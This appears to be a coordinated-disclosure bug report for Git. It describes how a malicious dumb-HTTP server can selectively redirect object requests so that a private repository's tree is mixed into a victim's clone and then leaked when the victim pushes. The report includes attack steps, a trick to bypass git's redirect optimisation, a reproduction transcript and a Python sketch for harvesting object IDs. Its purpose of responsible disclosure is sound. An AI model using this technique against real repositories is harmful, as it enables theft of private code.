This bug report assumes the following scenario:

 - A victim has access to a private git repository.
 - An attacker who knows the URL to the private repository wants to steal its contents.
 - The private git repository can be accessed over http or https.
 - The private git repository supports the dumb HTTP transport.
 - The victim authenticates to the private git repository either by source IP (imagine a git server in a company's internal network without explicit authentication) or has the credentials stored in a .netrc file.
 - To simplify the attack, it is assumed that the private git repository only contains one branch and no tags.
 - The attacker can convince the victim to pull a repository from the attacker's server, create a new commit in it and afterwards perform a push to the victim's server.
 - The victim retries fetching the attacker's repository if the first attempt fails.
 - I think packfiles on the server might block this attack.

The basic idea of the attack is: Because in the dumb HTTP protocol, each object is fetched using a separate HTTP request and git instructs curl to follow HTTP redirects, it is possible for a server to "mix in" objects from another server during a fetch/clone operation by selectively redirecting requests to the other server. If the user does not inspect all subdirectories of the cloned repository and pushes the cloned repository back to the internet, the mixed-in objects will be pushed as well.

More detailed steps of the attack:

1. When the user attempts to clone from the attacking server for the first time, forward all accesses to the victim server. This allows the attacker to observe object IDs from the repository (because they are sent in URLs). If there is only one branch, the first request for an object ID will be for the latest commit, the second one will be for the latest commit's tree.
After the object ID of the tree has been observed, all requests that arrive within a short timeframe can be rejected with an HTTP response like "500 temporary error" or so. Now, since the victim tree's object ID is known, the attacker can construct a git repository in which some tree contains an entry pointing to the victim tree.

2. When the user retries the clone operation (or someone else in the same network does), the attacker responds to requests with files from his own repository. If a requested object doesn't exist, it is assumed that the object is present on the victim server, and a redirect is sent. After this step, the victim user should have a repository that contains the attacker-created tree, with the contents of the private git repository's tree hidden in some subdirectory. (A more sneaky way would be to hide the private repository's tree somewhere in the history, not under the head commit.)

3. If the user now pushes the contents of the cloned repository (perhaps after adding a few more commits or so), the pushed repository contains a copy of the private repository's tree.

An issue for the attacker is that git attempts to optimize away redirects by emulating redirects locally if the redirect scheme looks predictable (in update_url_from_redirect()). However, this can be worked around by appending a dummy parameter to the URL, causing git to bail out of the optimization (the "insane redirect scheme" case).

Reproduction instructions:

Prepare the private repository:

~$ mkdir -p tmp/gitmix/victim_repo
~$ cd tmp/gitmix/victim_repo
~/tmp/gitmix/victim_repo$ git init
Initialized empty Git repository in [...]/tmp/gitmix/victim_repo/.git/
~/tmp/gitmix/victim_repo$ echo 'this is secret!' > secret.txt
~/tmp/gitmix/victim_repo$ git add secret.txt
~/tmp/gitmix/victim_repo$ git commit -m'initial commit'
[master (root-commit) 9f73f5b] initial commit
 1 file changed, 1 insertion(+)
 create mode 100644 secret.txt
~/tmp/gitmix/victim_repo$ git update-server-info
~/tmp/gitmix/victim_repo$ cd .git/
~/tmp/gitmix/victim_repo/.git$ python -m SimpleHTTPServer 8001 .
Serving HTTP on 0.0.0.0 port 8001 ...

In a new tab, prepare the attacker's repository, where `forward.py` is the attached file:

~$ mkdir tmp/gitmix/attacker_repo
~$ cd tmp/gitmix/attacker_repo
~/tmp/gitmix/attacker_repo$ git init
Initialized empty Git repository in [...]/tmp/gitmix/attacker_repo/.git/
~/tmp/gitmix/attacker_repo$ echo 'just a harmless repo' > harmless_file
~/tmp/gitmix/attacker_repo$ git add harmless_file
~/tmp/gitmix/attacker_repo$ git commit -m'initial commit'
[master (root-commit) 7e13ade] initial commit
 1 file changed, 1 insertion(+)
 create mode 100644 harmless_file
~/tmp/gitmix/attacker_repo$ git update-server-info
~/tmp/gitmix/attacker_repo$ python [...]/forward.py
serving at port 8000

Now, in another tab, as the victim user:

~$ cd tmp/gitmix/
~/tmp/gitmix$ git clone http://localhost:8000/
Cloning into 'localhost'...
error: The requested URL returned error: 500 temporary error, please try again (curl_result = 22, http_code = 500, sha1 = fc9f3b913607dc0fd2117a1b15e4a7c063c8b1e5)
error: Unable to find fc9f3b913607dc0fd2117a1b15e4a7c063c8b1e5 under http://localhost:8000
Cannot obtain needed tree fc9f3b913607dc0fd2117a1b15e4a7c063c8b1e5
while processing commit 9f73f5bade6cac025eb9bbc726fafe3cf878586c.
error: fetch failed.
~/tmp/gitmix$ # ensure at least 1s of delay here, then retry
~/tmp/gitmix$ git clone http://localhost:8000/
Cloning into 'localhost'...
Checking connectivity... done.
~/tmp/gitmix$ tree localhost/
localhost/
├── boring_subdir
│   └── secret.txt
└── harmless_file

1 directory, 2 files
~/tmp/gitmix$ cat localhost/harmless_file
just a harmless repo
~/tmp/gitmix$ cat localhost/boring_subdir/secret.txt
this is secret!

As you can see, the victim user indeed ends up with a repository that contains a mix of data from the attacker's repository and from the private repository. At this point, pushing to any repository will leak the contents of the private repository.

To remove the restriction that the private repository must not have more than one branch, a variation could be employed; for example, the attacker could store the first observed object ID instead of the second one (thereby guaranteeing that it belongs to a commit) and then rebase his whole history on top of that commit ID.

This bug is subject to a 90 day disclosure deadline. If 90 days elapse without a broadly available patch, then the bug report will automatically become visible to the public.
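
To illustrate why step 1 works (object IDs are visible in request URLs), here is a minimal Python sketch. It is not the attached forward.py. It assumes that loose objects are requested as objects/<2 hex chars>/<38 hex chars>, which is how the dumb HTTP transport names SHA-1 objects; the function names are hypothetical, and the request order in the example is the one assumed above for a repository with a single branch.

```python
import re

# Loose objects are requested as objects/<2 hex chars>/<38 hex chars> (SHA-1).
LOOSE_OBJECT_RE = re.compile(r"^/?objects/([0-9a-f]{2})/([0-9a-f]{38})$")


def object_id_from_path(path):
    """Return the 40-character object ID named by a request path, or None."""
    # Ignore any query string; only the path component names the object.
    path = path.split("?", 1)[0]
    match = LOOSE_OBJECT_RE.match(path)
    if match is None:
        return None
    return match.group(1) + match.group(2)


def observed_object_ids(request_paths):
    """Collect object IDs in request order, skipping non-object files."""
    ids = []
    for path in request_paths:
        object_id = object_id_from_path(path)
        if object_id is not None and object_id not in ids:
            ids.append(object_id)
    return ids


if __name__ == "__main__":
    # Assumed request order for a single-branch repository: ref files first,
    # then the head commit, then that commit's tree (IDs from the transcript).
    paths = [
        "/info/refs",
        "/HEAD",
        "/objects/9f/73f5bade6cac025eb9bbc726fafe3cf878586c",
        "/objects/fc/9f3b913607dc0fd2117a1b15e4a7c063c8b1e5",
    ]
    commit_id, tree_id = observed_object_ids(paths)[:2]
    print("commit:", commit_id)
    print("tree:  ", tree_id)
```

With the object IDs from the reproduction transcript, the first observed ID is the commit 9f73f5b... and the second is the tree fc9f3b9..., which is the tree the attacker then references from his own repository.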
Git: private repository theft by mixing repositories